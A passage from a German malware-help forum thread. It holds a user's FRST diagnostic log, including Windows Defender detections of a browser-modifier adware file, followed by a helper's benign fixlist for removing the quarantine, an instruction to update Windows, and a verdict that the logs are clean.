ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => d:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger) [Datei ist nicht signiert]
ContextMenuHandlers1-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers4-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-02] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\system32\x264vfw64.dll [3799552 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\system32\lagarith.dll [148992 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\system32\xvidvfw.dll [311296 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\system32\AC3ACM.acm [180736 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.voxacm160] => C:\Windows\system32\vct3216.acm [82944 2003-05-21] (Voxware, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.scg726] => C:\Windows\system32\scg726.acm [13239 2000-03-14] (SHARP Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.alf2cd] => C:\Windows\system32\alf2cd.acm [38912 2003-05-21] (NCT Company) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.lame] => C:\Windows\system32\lame.ax [245760 2005-08-01] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.dvsd] => C:\Windows\system32\mcdvd_32.dll [261632 2003-05-21] (MainConcept) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mpg4] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp42] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp43] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\system32\DivX.dll [638976 2003-05-22] (DivXNetworks, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP62] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\SysWOW64\lagarith.dll [216064 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [284672 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\SysWOW64\ac3acm.acm [122880 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.FFDS] => C:\Windows\SysWOW64\ff_vfw.dll [112128 2015-10-24] () [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Tom\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
Shortcut: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2019-06-17 20:35 - 2013-01-15 16:06 - 000061952 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2019-06-17 20:35 - 2013-06-26 16:01 - 000249856 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\language.dll
2020-11-25 22:21 - 2020-11-25 22:21 - 040403968 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleRT.WindowsPhone.dll
2020-11-15 10:30 - 2020-11-15 10:31 - 000052224 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleSystemFileWrapperRT.dll
2019-02-20 19:01 - 2019-02-20 19:01 - 001123840 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\e_sqlite3.dll
2017-12-10 20:25 - 2011-08-23 13:04 - 000057344 _____ () [Datei ist nicht signiert] d:\WinTV8\TVServer\libhdhomerun.dll
2017-12-10 20:25 - 2015-11-24 20:59 - 000134656 _____ (Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\WinTV8\hcwtsfilter.ax
2017-12-10 20:25 - 2015-11-24 20:59 - 000113152 _____ (Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\WinTV8\HCWTSWriter.ax
2017-12-10 20:25 - 2016-04-26 12:29 - 000332288 _____ (Hauppauge Computer Works, Inc.) [Datei ist nicht signiert] D:\WinTV8\WinTV8\PsiParser.ax
2019-06-17 20:35 - 2011-11-22 13:22 - 000143360 _____ (Holtek) [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HIDApi.dll
2019-08-31 09:32 - 2020-06-24 09:32 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-08-31 09:32 - 2020-06-24 09:32 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll
2020-03-24 07:35 - 2020-06-24 09:32 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Public\AppData:CSM [468]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [482]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3451750051-380284315-2914928687-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - StExBar - {367D8B32-F9FD-474b-8E65-9E521F35DE99} - C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
Handler-x32: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files (x86)\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL [2000-04-19] (Microsoft Corporation) [Datei ist nicht signiert]
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\localhost -> localhost

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2017-09-29 14:46 - 2020-12-02 22:43 - 000000027 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1      localhost

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\DATA\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Calibre2\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Tom_Admin\AppData\Local\Microsoft\WindowsApps;;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img3.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "AutoStart IR.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WinTV Recording Status.lnk"
HKLM\...\StartupApproved\Run: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Updater"
HKLM\...\StartupApproved\Run32: => "RazerCortex"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\StartupApproved\StartupFolder: => "Mounten.bat"
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\StartupApproved\Run: => "Lync"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

25-11-2020 11:07:47 Geplanter Prüfpunkt
28-11-2020 13:26:43 DirectX wurde installiert
02-12-2020 23:12:12 Removed Java 10.0.2 (64-bit)

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (12/03/2020 04:31:04 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.
]

Error: (12/02/2020 10:08:27 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 02:41:01 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 02:40:55 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 11:28:07 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (I:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:28:02 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Zwi_Lager (H:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:47 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:46 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Medien (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)


Systemfehler:
=============
Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Origin Web Helper Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "PDF24" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Wondershare Driver Install Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "SQL Server VSS Writer" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "StarMoney 11 OnlineUpdate" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "HauppaugeTVServer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 5000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/03/2020 04:43:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Wondershare Application Update Service 3.0" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


Windows Defender:
===================================
Date: 2020-12-02 23:35:07.0500000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {4E4295A2-5849-4368-8117-363E484EFDAA}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-12-02 22:27:02.4060000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou&threatid=224074&enterprise=0
Name: BrowserModifier:Win32/Prifou
ID: 224074
Schweregrad: Hoch
Kategorie: Browserveränderer
Pfad: file:_C:\Users\Vincent\AppData\Roaming\Ranederapec.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: System
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: Unknown
Sicherheitsversion: AV: 1.327.1933.0, AS: 1.327.1933.0, NIS: 1.327.1933.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5

Date: 2020-12-02 22:25:29.9320000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou&threatid=224074&enterprise=0
Name: BrowserModifier:Win32/Prifou
ID: 224074
Schweregrad: Hoch
Kategorie: Browserveränderer
Pfad: file:_C:\Users\Vincent\AppData\Roaming\Ranederapec.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-HRMFF6U\Tom
Prozessname: C:\Users\Tom\Desktop\FRST64.exe
Sicherheitsversion: AV: 1.327.1933.0, AS: 1.327.1933.0, NIS: 1.327.1933.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5

Date: 2020-12-02 11:17:15.2310000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {37BBC7C9-ECE9-436C-9C2F-12E32BAFC0D6}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-12-01 11:17:56.7110000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {3B9EFD20-3A12-4BA9-B5A1-D926A6AD922F}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-12-03 16:31:36.8420000Z
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Laden der Sicherheitsinformationen aufgetreten. Es wird versucht, zu einer als fehlerfrei bekannten Version zurückzukehren.
Sicherheitsversion versucht: Aktuell
Fehlercode: 0x80070003
Fehlerbeschreibung: Das System kann den angegebenen Pfad nicht finden.
tSicherheitsversion: 0.0.0.0;0.0.0.0
Modulversion: 0.0.0.0

CodeIntegrity:
===================================

Date: 2020-12-03 16:27:39.4840000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-03 16:27:14.3300000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-03 16:27:14.2080000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:54.5040000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:39.1240000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:39.0420000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

==================== Speicherinformationen ===========================

BIOS: American Megatrends Inc. 0317 10/20/2016
Hauptplatine: ASUSTeK COMPUTER INC. PRIME H270-PRO
Prozessor: Intel(R) Core(TM) i5-7600 CPU @ 3.50GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 16318.9 MB
Verfügbarer physikalischer RAM: 10793.03 MB
Summe virtueller Speicher: 18750.9 MB
Verfügbarer virtueller Speicher: 11462.26 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.29 GB) (Free:90.91 GB) NTFS
Drive d: (Programme) (Fixed) (Total:196.74 GB) (Free:86.37 GB) NTFS
Drive e: (Spiele) (Fixed) (Total:390.62 GB) (Free:92.3 GB) NTFS
Drive f: (Medien) (Fixed) (Total:1230.47 GB) (Free:105.66 GB) NTFS
Drive g: (Daten) (Fixed) (Total:195.31 GB) (Free:172.89 GB) NTFS
Drive h: (Zwi_Lager) (Fixed) (Total:390.62 GB) (Free:145.68 GB) NTFS
Drive i: (Volume) (Fixed) (Total:390.62 GB) (Free:59.39 GB) NTFS

\\?\Volume{79857743-b9df-46b3-96bf-e4e8d9a3cd63}\ () (Fixed) (Total:0.49 GB) (Free:0.04 GB) NTFS
\\?\Volume{71e4b085-1259-4f2a-94a3-b1ef97ec4058}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 2794.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================

M-K-D-B 04.12.2020 11:00
Schritt 1
  • Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    DeleteQuarantine:
    Unlock: C:\FRST
    Reboot:
    End::
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
Auf deinem Computer fehlt das aktuelle Funktionsupdate Version 20H2.
Zitat:
Platform: Windows 10 Pro Version 2004
  • Folge dem Pfad Start > Einstellungen > Update und Sicherheit > Windows Update und klicke auf Nach Updates suchen.
  • Wähle das Funktionsupdates aus, downloade und installiere es.
  • Alternativ kannst du auch mit dem Update Assistenten deine Windows-Version auf den neuesten Stand bringen.
    Klicke dazu auf Jetzt aktualisieren, lade dir den Update-Assistenten herunter und führe ihn aus.






Dann wären wir durch!
Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber. :daumenhoc


Abschließend bitte noch einen Cleanup mit unserem TBCleanUpTool durchführen und unbedingt die Sicherheitsmaßnahmen lesen und umsetzen - beides ist in folgendem Lesestoff verlinkt:

